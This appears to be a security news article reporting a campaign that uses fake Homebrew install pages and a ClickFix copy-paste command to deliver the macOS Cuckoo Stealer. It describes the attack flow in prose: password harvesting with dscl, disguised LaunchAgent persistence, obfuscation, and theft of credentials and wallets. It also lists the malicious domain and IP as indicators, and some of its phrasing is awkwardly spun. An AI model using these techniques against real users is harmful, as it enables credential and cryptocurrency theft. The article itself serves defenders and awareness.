Through phony Homebrew installation pages that install the extensive credential-harvesting malware Cuckoo Stealer, a sophisticated social engineering campaign is targeting macOS developers This article explores credential harvesting malware. . The ClickFix technique, which deceives users into running malicious Terminal commands masquerading as authentic software installation scripts, is used in this attack.

This campaign takes advantage of user trust and well-known developer workflows, in contrast to conventional exploits that target software vulnerabilities. The main focus of the operation is typosquatted domains, which are exact replicas of the official Homebrew website. Developers are presented with what looks like a typical installation command with a handy copy button when they visit these fraudulent pages. A single domain change, from raw.githubusercontent.com to raw.homabrews.org, distinguishes the malicious command from the legitimate one.

This change is subtle enough to evade a cursory examination.

Details of the homabrews.org domain registration in Hunt indicate a high-risk rating (Source: Hunt.io). The script ensures attackers obtain valid credentials prior to deploying the second-stage payload by harvesting user credentials through a continuous password prompt loop using macOS Directory Services. After identifying the typosquatted domain homabrews.org, registered on January 13, 2026, Hunt.io analysts were able to identify this campaign.

Multiple flagged URLs, including the crucial raw.homabrews.org subdomain, are displayed by phishing URL detection (Source: Hunt.io). Six interconnected domains with the earliest certificates dating back to July 2025 were found to be hosted on shared infrastructure at IP address 5.255.123.244, according to infrastructure analysis.

At 5.255.123.244, several malicious domains are housed on shared IP infrastructure (Source: Hunt.io). To increase their deceptive effectiveness, the domains use a variety of typosquatting strategies, such as character omission, double-letter substitution, and alternative top-level domains. Workflow for Technical Infection The attack is carried out in two phases.

The first-stage script uses the dscl authonly command to surreptitiously validate user passwords while posing as a genuine Homebrew installer. In order to avoid raising suspicions, this validation loop perfectly mimics standard sudo behavior by displaying "Sorry, try again" for incorrect passwords. The script downloads a binary called brew_agent after valid credentials have been obtained. This binary encodes the stolen password in Base64 format and passes it as an argument to gain instant access to protected system resources.

Through the macOS LaunchAgent system, Cuckoo Stealer creates persistence by posing as com.homebrew.brewupdater.plist in order to blend in with the system's normal processes. Among its many anti-analysis strategies is locale-based filtering, which stops the malware from running on systems set up for Commonwealth of Independent States nations. It blocks Armenian, Belarusian, Kazakh, Russian, and Ukrainian locales.

To avoid static analysis and signature detection, all sensitive strings are encrypted using index-based key rotation and XOR-based obfuscation. Using macOS Directory Services, a credential harvesting loop demonstrates password validation (Source: Hunt.io). The command-and-control system employs X25519 elliptic curve Diffie-Hellman key exchange for session encryption in encrypted HTTPS communications.

Base64 encoding of stolen credentials is demonstrated in the second-stage payload download (Source: Hunt.io). With features like shell command execution, system reboot, self-destruct mechanisms, and controlled data exfiltration threads, the malware performs the functions of a complete remote access trojan. It targets user credentials from all of the main macOS browsers, as well as over 20 cryptocurrency wallet applications, macOS Keychain databases, Apple Notes, messaging apps like Telegram and Discord, and cryptocurrency wallet extensions like Coinbase Wallet and Phantom Wallet.

Set ZeroOwl as a Preferred Source in Google and use X, LinkedIn, and LinkedIn to receive more real-time updates.